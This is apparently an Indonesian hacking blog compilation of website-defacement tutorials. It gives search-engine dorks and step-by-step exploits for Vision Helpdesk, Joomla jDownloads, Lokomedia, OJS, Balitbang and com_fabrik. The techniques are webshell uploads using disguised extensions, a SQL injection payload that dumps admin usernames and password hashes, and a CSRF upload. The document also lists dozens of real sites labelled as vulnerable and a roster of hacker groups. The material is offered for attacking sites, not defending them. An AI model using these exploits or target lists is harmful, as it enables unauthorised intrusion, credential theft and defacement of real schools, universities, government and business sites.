Deface teknik Vision Stabel Profil HELPDESK

Dork :intext:"Powered by vision Helpdesk"

inurl:"/index.php?/client/register

"(Kembangin lagi, gunakan imajinasi vokepers biar dapet yang vuln n verawan)

eXploit : target.com/[path]/index.php?/client/register

1. Dorking menggunakan Search Engine

2. Pilih target kalian, Lalu masukan eXploitnyee.contoh: target.c0li/index.php?/client/register

3. Vulnerability ~ Muncul Form RegisterKaloAccess Deniedikhlaskan dan Move On :p

4. Isi dah form registernya,, asal2an bae, sing pentingusernamedanpasswordnyajan asal2an.karena buat nantiLogin

5. Kalo register sukses muncul notif Successfully di page Login

6. Langsung login bae pake akun yg tadi dah lu register

7. Langsung klikProfile

8. dan KlikEdit Profile

9. Lalu Upload Script Deface kalian. Untuk upload script deface nya, Lu rename jadi script.jpg html juga bisa deh tergantung web  bebz, jadi gak perlu di tamper data .

10. Sukses kan upload Script Deface nya?

11. Untuk lihat script deface yang sudah di upload tadi, tinggalklik kanandi image nya, laluview image /open image in new tab.BooM ~Seruput Kopi ~

Tutorial deface cms joomla dengan exploit jdownloads shell upload vulnerability

 Tutorial Deface CMS Joomla dengan eXploit Jdownloads Shell Upload Vulnerability .

Let's Play with me Baby ;*

Dork : intext:"Powered by jDownloads"

(gunakan imajinasi vokepers lu, biar dapet yg vuln n verawan)

eXploit :
/index.php?option=com_jdownloads&Itemid=1&view=upload
atau
/index.php?option=com_jdownloads&Itemid=1&task=upload

Script Deface dengan ekstensi deface.html.j, deface.txt.j atau yang mau upload Shell silahkan siapkan shell.php.php.j

1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.
cth: target.coli/index.php?option=com_jdownloads&Itemid=1&view=upload

3. Vulnerability ~ Muncul Formulir

4. Lalu isi data2 yang perlu tunjukkan imajinasi mu guys uploads script pepes mu atau shell kalian
contoh Gua upload file mamam.php.php.j

5. Kalo sukses nanti Muncul icon +berwarna Hijau.

6. File/Shell Akses: /images/jdownloads/screenshots/filelu.php.j

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung 

Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek saya
Happy Joomla Hacked~
Sekian dan semoga bermanfaat .. terimakasih

Source and Thanks to: Idiot Attacker, TKJ Cyber art

Kumpulan Web vuln

web vuln 2017

http://bestilling.utdanningsdirektoratet.no/
http://apbw.e-bestis.com.tw/
http://cht.e-bestis.com.tw/
http://tcc.e-bestis.com.tw/
http://doacoes.fussesp.sp.gov.br/
http://bestilling.udir.no/
http://www.567888.pw/
http://www.6y555.com/
http://www.sungod-lighting.com/
http://www.dgxwx.com/
http://www.yiduseiki.com/
http://hncjwy.com/
http://5.99.166.67/
http://apparelworld.org/
http://bico.ecampus.it/
http://fet.e-bestis.com.tw/
http://irfaspx.irfanmil.it/
http://hicmo.ecampus.it/
http://opale.ecampus.it/
http://silos.ecampus.it/
http://syscomresources.com.my/
http://www.danahias.at/
http://www.irfanmil.it/
http://tcc.e-bestis.com.tw/
http://www.gdmc-kwt.com/
http://qfirst.br.sgs.com/
http://www.ymcta.com/
http://ent.njtrh.org/
http://lcocyouth.candp-ent.com/
http://www.wsdscu.org/
http://www.e-doc.fte.kmutnb.ac.th/
http://wangshibee.com/
http://morganexport.com/
http://fwclass.com/
http://scm.icams.co.kr/
http://bestilling.udir.no/
http://158.36.153.158/
http://doacoes.fussesp.sp.gov.br/
http://apbw.e-bestis.com.tw/
http://asia.e-bestis.com.tw/
http://cht.e-bestis.com.tw/
http://fet.e-bestis.com.tw/
http://imode.e-bestis.com.tw/
http://tcc.e-bestis.com.tw/
http://bico.ecampus.it/
http://ciscos.ecampus.it/
http://hicmo.ecampus.it/
http://hicmoproject.it/
http://irfaspx.irfanmil.it/
http://opale.ecampus.it/
http://www.ecampus.it/
http://www.irfanmil.it/
http://www.dgxwx.com/
http://www.sungod-lighting.com/
http://158.36.153.158/
http://bestilling.udir.no/
http://www.dgxwx.com/
http://www.sungod-lighting.com/
http://www.yiduseiki.com/
http://doacoes.fussesp.sp.gov.br/

Deface teknik Lokomedia

Dork :
inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html
Kembang pake otak bokep mulu guys lagi biar dapet yg VULN + Perawan :p :*
2. Exploit
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

3. MD5 Decrypter KHUSUS MD5 DECRYPTER, LU DECRYPT PAKE OTAKLU NDIRI! Bercanda :v
Ada tools online nya kok :p
https://hashkiller.co.uk/md5-decrypter.aspx
http://md5online.org
/Tutorial:
1. Dorking pake dork di atas.
2. Pilih salah satu target. Salah dua juga gapapa :v
3. Masukan injeksi nya.
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

Gatau caranya? :v Sini gua ajarin :p
http://site.co.li/statis-1-profil.html

Lu tambahin exploit nya sesudah angka. Jadinya gini:
http://site.co.li/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
4. Kalo vuln jadinya bakal ada tab selanjutnya bukan eror yak (hehe)
5. Tekan Ctrl+U trus copy MD5 nya ke MD5 Decrypter.
6. Tinggal cari admin page nya. Biasanya sih di
:http://target.co.li/admin
http://target.co.li/adminweb
http://target.co.li/administrator
http://target.co.li/redaktur
7. Tanem shell? Use ur brain :) Jangan maunya disuapin mulu!
8. Akses shell? Klik kanan gambar yg ancur. trus 'Copy Image Location'.
9. Jan lupa pasang nick gw di Script lu :v

Daftar team cyber siap tempur

LIST GRUP CYBER INDONESIAN SIAP TEMPUR :
01.INDONESIA FIGHTER CYBER |
02.CyberSecurity Team |
03.Indonesian Hacking Groups |
04.IDCA | KRA-Coder |
05.GARUT BLACKHAT FIGHTER CYBER |
06.Badut-Team |
07.Indonesia Security Down |
08.Ofprogrammer Team |
09.PCC-Team |
10.The Cyber Heroez |
11.S.O.S malware ghost VPN |
12.Anonymous Cyber 04|
13.Gembel Black kracker's |
14.Cyber Brother |
15.Blackc0de |
16.SULSEL HACKER TEAM |
17.Hkc Team |
18.Keep_siL3nt Ternate Crew |
19.Amikom Cyber Team |
20.Bengkulu Hacker Team |
21.Palembang Hacker Link |
22.Cyber4rt |
23.Manusia Biasa Team |
24.Yogyakarta-CyberShadow |
25.Indonesian Hacker Team |
26.Hacker Indonesia |
27.Java Defacer Team |
28.207 Cyber Security|
29.Ravaz`CyberTeam|
30.Surabaya Blackhat |
31.Prabumulih Hacker Team |
32.Lampung black heart cyber |
33.Sund4nyM0uz Corporation |
34.Android Cyber Fighter |
35.Bekasi Cyber |
36.ISD | 37.SHRI |
38.Greget Hacking Team |
39.Team Sungai Raya Hacker |
40.HN Community | XCode |
41.JOKERHAT HACKERS |
42.Klaten Hacker Team |
43.Jogja Hacker Team |
44.Bandung Blackhat |
45.Zone-Injector |
46.DEFACE ZONE |
47.Malang Cyber Crew |
48.Hiddenymouz |
49.SULSEL HACKER TEAM |
50.$03B4NK Brother's |
51.Cyber R |P-H| T |
52.Indonesia Light Cyber |
53.Warcops Cyber Team |
54.PERAWANGCYBER |
56.Ahmed DeathRace Cyber |
57.New Team Cyber dan Attacker_404 Cyber
Team |
58.Greget Hacking Team |
59.Serdadu bayangan |
60.KayuagungCyberTeam |
61.Cyber Underground Activit, Minang_Cyber |
62.TKSI Black Team |
63.Makassar hacker team |
64.Palembang hecker |
65.Kukuruyuk dlooo om jihad
66.Anonymous | 67.Aceh Cyber Team |
68.Hacker Newbie |
69.Lampung Cyber Hacker Team |
70.Majalengka Cyber Hacker Team |
71.Suwong cyberteam premen |
72.Exploit UMMU Hacking |
73.Server Corporation Team |
74.Ravaz`CyberTean |
75.Anonymous 56 |
76.SAGA 5 FIGHTER CYBER |
77.Gembel Black krackker's |
78.Hidden School Hacker |
79.LastCyber Team |
80.Ariel Noah cyber team |
81.X-code |
82.Binus Hacker |
83.Devilzc0de |
84.IndoCyberMafia Sec |
85.Awesome Crew |
86.TNG cyber tangerang |
87.Hc-Crew |
88.SP Cyber Team |
89.Bekasi Cyber |
90.kecoa H4CK3R T34M |
91.Team Royale! |
92.Binhacker Tunggal Ika |
93.Ravaz' CyberTeam |
94.BAMBU RUNCING CYBER |
95.Hidden-Name Corp |
96.Muslim Muwahhid |
97.Anonymous Sixcents School |
98.Lampung Defacer Team |
99.IndonesianyMOuz Corporation |
100.JawaBarat Jihad Cyber |

Deface teknik OJS (Open Journal Sistem)

Deface OJS
Dork: inurl:/index.php/index/user/register site:ac.id
1. Search google pake dork di atas
2. Pilih salah satu web yang pengen di gebug
3. Masukan exploit nya contoh.com/files/ kalo index off berarti vuln
4. Balik ke web yang mau di gebug
5. Register centang author aja jangan yang laen
6. masuk dasboard member
7. Klik new submasion / buat naskag
8. Centang semua
9. Upload Shell extensi .phtml / .html conth.phtml / contoh.html
Akses shell conth.com/files/journals/anka random/submassions/angka random/articles/angka random pas uplot shell.phtml

Deface balitbang

- CSRF :  Script CSRF Balitbang ( Copy, lalu paste dinotepad, dan save dengan extensi file ' .html ' / ' .htm '
- Email yang masih aktif
- Wajah ganteng :p

Langkah - Langkah :

1. Pertama-tama kita cari dulu targetnya di google, dengan dork berikut :

inurl:/member/daftar.php

2. Setelah menemukan targetnya, kita klik target tersebut, dan masukin exploit berikut :
/member/daftar.php
Contoh : http://site.sch.id/member/daftar.php

3. Maka tampilannya akan seperti ini :

4. Lalu isikan kotak yang kosong itu, dan klik Daftar / Simpan
5. Setelah kita klik Daftar / Simpan, maka tampilannya akan seperti ini :

6. Setelah itu kita buka email kita ( email yang tadi buat daftar jadi member )
7. Lalu lihat di Kotak Masuk / di SPAM, lalu kita klik Validasi Member

8. Setelah kita mengklik Validasi Member, maka tampilannya akan seperti ini :

9. Lalu klik Lanjutkan, dan masukan Username dan Passwordnya ;)
10. Setelah kita masuk, lalu buka CSRFnya ( Untuk upload shell )
11. Copy ( Web Depan / Web Sekolahnya ) dan paste webnya ke CSRF, Lihat gambar :

12. Setelah itu, kita save dan buka CSRFnya, maka tampilannya akan seperti ini :

13. Setelah itu, tinggal pasang shell backdoor kalian dan klik Upload :D ( Jika tidak punya shell backdoor, sebaiknya cari dulu di google, dan download :p )
14. Setelah kita klik Upload, maka akan ada bacaan seperti ini
'  Anda tidak diperkenankan mengakses fasilitas ini.
Silahkan daftar menjadi member dan login terlebih dahulu. '  itu tandanya kita berhasil memasang shell ^_^
15. Tempat akses shellnya : /materi/file.php ( ingat, walaupun shell yang kalian upload tadi bernama ganteng.php atau apalah yang sering kalian pake, maka setelah kita meng uploadnya, itu akan berubah menjadi file.php ) tetapi jika kita buka /materi/file.php malah 404 Not Found / 500 Internal Server / 403 Forbidden, saya sarankan kalian mencari target lain :p

contoh : http://site.sch.id/materi/file.php
16. Setelah shell kalian kebuka, kalian bebas deh mau ngapain aja :D tapi saya saranin sih jangan tebas indexnya :D cukup nitip file saja :D

Deface teknik com_fabrik

Dork:
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/
site:inurl:index.php?option=com_fabrik&view=
site:inurl:importcsv.php site:inurl:viewTable?cid=site:com
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)
Exploit: /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
or
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.contoh:target.coli/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
3. Vulnerability ~ Muncul Form Upload.. Upload Shell/File agan, Lalu Klik Import CSV4. Shell/File Akses:/media/namafileagan
contoh: target.coli/media/AttackerCyberTeam.php
Gimana Mau PhP, HTML aja masih belajar :'D
Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe Jantung2" kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP Sayang :) ))
Jadilah Dispenser yg Baik, saat anda berhasil MengEksploitasi suatu web, Usahakan laporkan Bug, dan kalo bisa sih bantu Patch secara Sukarela
*Tetap hargai para WebMaster ;*
cuma nitip file, and seng iseng saja ;*
"Tidak semua website bisa di eksploitasi dgn teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"